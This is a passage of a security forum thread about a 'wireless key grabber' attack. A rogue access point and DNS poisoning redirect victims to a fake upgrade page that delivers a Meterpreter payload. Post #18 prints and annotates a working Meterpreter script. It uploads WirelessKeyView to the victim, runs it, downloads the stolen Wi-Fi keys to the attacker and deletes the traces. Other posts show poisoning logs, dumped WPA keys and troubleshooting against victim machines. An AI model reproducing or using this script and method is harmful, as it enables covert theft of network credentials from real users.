Page 2 of 5 FirstFirst 1234 ... LastLast
Results 11 to 20 of 44

Thread: Wireless key grabber - Backtrack 4

  1. #11
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I went back and tried your tutorial with an XP victim PC and it worked. I configured lighttpd on BT3 and everything appeared to be functional. However, once the victim runs the payload, isn't his connection supposed to forward through eth0? Victim is only receiving your upgrade page. Also, the payload isn't removed, it remains in the temporary internet files.

    Code:
    Received data from: 10.0.0.254:60181 with length: 32 asking for: www.google.com
    POISONED...
    Received data from: 10.0.0.254:62623 with length: 29 asking for: www.cnn.com
    POISONED...
    Received data from: 10.0.0.254:56017 with length: 39 asking for: download718.avast.com
    POISONED...
    I'll writeup a walkthrough for BT3 once these remaining issues are addressed. Any idea on the Vista?

    William

  2. #12
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    sorry but no,
    nice tutorial,, its been a wile since any good tut's went up.
    anyway so i pawned my self and obtained ==================================================
    Network Name (SSID): BigPond1967
    Key Type : WPA-PSK
    Key (Hex) : 3138383234393634323200
    Key (Ascii) :
    Adapter Name : D-Link AirPlus G DWL-G122 Wireless USB Adapter(rev.C)
    Adapter Guid : {********-****-****-****-*************}
    ==================================================
    now thats not my key, or it is my key but in hex, how do i crack the hex out put or even calculate it to me key???
    I would rather be hated for what i am,
    Then loved for what i am not.

  3. #13
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Use a HEX to ASCII converter?
    http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

    William

  4. #14
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Quote Originally Posted by williamc View Post
    Use a HEX to ASCII converter:
    http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

    William

    I don't think that will work, it doesnt generate a passphrase, you can use cain/abel in windows and convert the hex to a passphrase but is it really needed, and it does take a while, can you not enter the hex directly?


    you should be able to enter hex key directly in ubuntu/bt4, I think i posted it in another thread. Just google "entering 64 character wpa key linux" or something similar

  5. #15
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    this thread is just a wireless key grabber, and nothing else, no internet access available,

    if you want it to do this then the steps would be

    create AP
    ip tables with forwarding traffic via eth0

    victim connects, surfs the internet, then use the dns tool to redirect user to fake webpage, and then switch off dns poisoning tool

  6. #16
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Thanks for the reply hm2075. I realize that I've been looking at two different scripts

    However, there are still some problems that Im having issue with. First off, this does not seem to work on Vista clients. I spent days trying to get it working, and finally ran it on XP and it worked no problem. Anyone have luck with Vista?

    Second, I understand that you can enter the hex key into Ubuntu, but that is problematic in XP. I've tried your suggestion of using Cain, but the key does not appear to be long enough and crashes Cain. Ideas?

  7. #17
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    When you type a WPA-PSK key in Windows XP, the characters that you type are automatically converted into a new binary key that contains 32 bytes (64 Hexadecimal digits). This binary key cannot instantly be converted back to the original key that you typed, but you can still use it for connecting the wireless network exactly like the original key. In this case, WirelessKeyView displays this binary key in the Hex key column, but it doesn't display the original key that you typed.
    As opposed to Windows XP, Windows Vista doesn't convert the WPA-PSK Key that you type into a new binary key, but it simply keep the original key that you type. So under Windows Vista, the original WPA-PSK key that you typed is displayed in the Ascii key column.

    so two things here, vista shows the passphrase where as xp shows the hex key, we learn two things here, wireless key viewer works on xp and vista, and we know the key formats too.

    taken from grc
    Each of the 64 hexadecimal characters encodes 4 bits of binary data, so the entire 64 characters is equivalent to 256 binary bits — which is the actual binary key length used by the WiFi WPA pre-shared key (PSK). Some WPA-PSK user interfaces (such as the one in Windows XP) allows the 256-bit WPA pre-shared key to be directly provided as 64 hexadecimal characters. This is a precise means for supplying the WPA keying material, but it is ONLY useful if ALL of the devices in a WPA-protected WiFi network allow the 256-bit keying material to be specified as raw hex. If any device did not support this mode of specification (and most do not) it would not be able to join the network
    this bit is interesting, is it saying some routers will not accept the key format to be in hex?

    to try and convert the key back to passphrase open up cain/abel
    click on the cracker tab, right click on the right panel and press add to list, now enter the wpa key in hex, right click again on the essid and change it, finally right click and choose the crack method.

    Now you will see if you try to bruteforce then it will take about a 1000 years for a key that is 8 chars, so the bottom line is there is no point trying to convert the hex into a passphrase, you might as well just try and crack the handshake in the first place

    so back to square one, we need a way to directly enter the wpa hex key, thats not a problem in ubuntu so i'd say end of discussion.. LOL

    next post will deal with vista prob i hope

  8. #18
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    We shall go through the harvester.rb so that people understand the coding.

    # bin -- the name of our exe, straight forward here, wireless key viewer has been renamed to wkv.exe
    bin = "wkv.exe"

    # output of wireless key viewer -- what we want here is a random text file to be generated when wkv is ran, otherwise every victim will have the same txt file and you wont know the difference
    out = Rex::Text.rand_text_alpha_upper(5) + ".txt"

    #destination for the keys in txt format - where we want our keys uploaded on our backtrack machine
    dest = "/root/Desktop/WKV/"

    #upload wireless key viewer --- line 1 is just a comment, line 2 is waiting, line 3 is telling meterpreter to upload our "bin" which is wkv to the system drive on the victim which is mostly c:,the location of of wkv.exe, and then a comment
    print_status("Uploading Wireless Key Viewer")
    sleep(1)
    client.fs.file.upload_file("%SystemDrive%\\#{bin}" , "/root/Desktop/WKV/wkv.exe")
    sleep(1)
    print_status("Uploaded Wireless Key Viewer")
    sleep(1)


    #execute via cmd, output will be random name, executes the wkv file with the /stabular parameter with "out" as described above.

    print_status("Executing wireless key viewer ")
    client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
    print_status("wkv executed")
    sleep(1)

    #download keys to our keys folder, destination as coded above, out is our random text file as coded above
    print_status("Downloading keys to keys folder ")
    client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
    print_status("Downloaded keys to keys folder ")

    #delete uploaded files -- we can also clear logs here if we want to
    sleep(1)

    print_status("Deleting uploaded files ")
    client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
    client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
    print_status("Have a nice day!!!!!! ")

  9. #19
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    so the question is where is vista breaking down

    first check if the wkv file is being uploaded into the system drive e.g c:

    then check if the random text file is being generated,

    if both work then it is the uploading that is not working

    haven't got a vista machine so unable to test

    with the payload being stuck in temp files, we should be able to delete it using scripts but it is harmless there because execution is only a one time process.

  10. #20
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the dhcp information from the attack box, but get "page cannot be displayed" when browsing. I cannot ping the attack box IP or Gateway, I get "Destination Unreachable".

    As for the wireless key in hex, this is what I gets dumped into the WKV folder:
    Code:
    cat FVPVC.txt
    Linksys             WPA-PSK             a78178f5a4050ce82de1              Dell Wireless 1350
    w {15CDB4A8-98B9-4285-
    Its not 64 bytes, and like I said, crashes Cain when I load it.

    William

Page 2 of 5 FirstFirst 1234 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •